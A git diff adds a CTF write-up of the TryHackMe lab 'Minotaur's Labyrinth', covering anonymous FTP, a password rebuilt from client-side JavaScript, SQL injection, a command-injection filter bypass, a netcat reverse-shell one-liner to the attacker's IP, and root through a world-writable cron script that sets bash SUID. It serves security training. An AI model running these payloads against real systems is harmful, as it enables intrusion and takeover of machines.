diff --git a/TryHackMe/Minotaur.md b/TryHackMe/Minotaur.md
new file mode 100644
index 0000000..8b67d8c
--- /dev/null
+++ b/TryHackMe/Minotaur.md
@@ -0,0 +1,166 @@
+# TryHackMe-Minotaur's Labyrinth
+
+## NMAP
+
+```bash
+
+21/tcp open ftp syn-ack ttl 63 ProFTPD
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_drwxr-xr-x 3 nobody nogroup 4096 Jun 15 14:57 pub
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
+|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
+| http-title: Login
+|_Requested resource was login.html
+443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
+|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+3306/tcp open mysql? syn-ack ttl 63
+| fingerprint-strings:
+| NULL:
+|_ Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
+| mysql-info:
+|_ MySQL Error: Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint
+```
+
+## PORT 21 (FTP)
+
+Since `anonymous` login is enabled , we can login to ftp without the need of password
+
+
+
+We can see a directory named `pub` and in that folder we'll see another hidden folder and a text file
+
+
+
+From `.secret` we'll get two more text files
+
+
+
+The message that those two files give us is
+
+
+
+## PORT 80 (HTTP)
+
+On the webserver we can find a login page
+
+
+
+If we check the source , we can fing `login.js`
+
+
+
+
+
+Looking into the javascript file , we can see there are three arrays , `a`,`b` and `c` and the indexes of these 3 arrays are being combined to generate a password , so we need to just copy that part of the function and just print the concatenated value of string also to note that this is a password for `Daedalus`
+
+```python
+a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
+b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
+c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
+print (a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8])
+```
+
+
+
+After submitting those credentials onto the login page we'll be granted access to the dashboard
+
+
+
+If we scroll down a little , we can see that there are two options , either we search for people name from `People` table or we search for creature name from `Creatures` table , so let's run `burp suite` on this page and try some sqli
+
+If we search the name "Daedalus" it will return us this user's id and password
+
+
+
+So let's try a sqli `'or 1=1 --`
+
+
+
+And this gave us all the reuslts from Person's table, we can also check how many number of columns does this table have so we can also enumerate which version of `mysql` it's using.
+
+
+
+If we try to arrange the records by 4th column it's going to give us an error meaning that there are only 3 columns in the table
+
+
+
+We can crack the users password from `crackstation` website
+
+
+
+On logging in with `M!n0taur` user we can see another tab in navigation bar
+
+
+
+
+
+## Foothold
+
+On this page we can echo text but if we try to break out of the command to run bash commands we can't as it's using this regex (saw from the hint)
+
+`/[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/`
+
+This regex doesn't include `|` so we can echo `id` and pipe it's reuslt to `bash`
+
+
+
+We can check if there's netcat (nc) available on this machine
+
+
+
+To get a reverse shell , we need to base64 encode the netcat shell because there will be special characters in the payload so first we'll convert it to base64
+
+`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 2222 >/tmp/f`
+
+
+
+And we'll send it by piping it to base64 deocde and then to bash
+
+
+
+Stabilizing the shell
+
+
+
+We can check the `echo.php` file just to understand what was happening in the background
+
+
+
+Also we can find database credentials from `dbconnect.php`
+
+
+
+In `user` directory we can get our user flag
+
+
+
+## Privilege Escalation (root)
+
+We can find a directory named `timer` in root directory `/`
+
+
+
+```bash
+#!/bin/bash
+echo "dont fo...forge...ttt" >> /reminders/dontforget.txt
+```
+
+We know that everyone can read ,write and execute this bash script , so we can try to add `id` and save the result in a file ,and if we wait for the bash script to be executed we'll see the result of this command
+
+
+
+
+
+Now what we can do is , make bash a `SUID` so when we execute bash it will be executed as root user and we will get shell as root user
+
+
+
+
+
+
\ No newline at end of file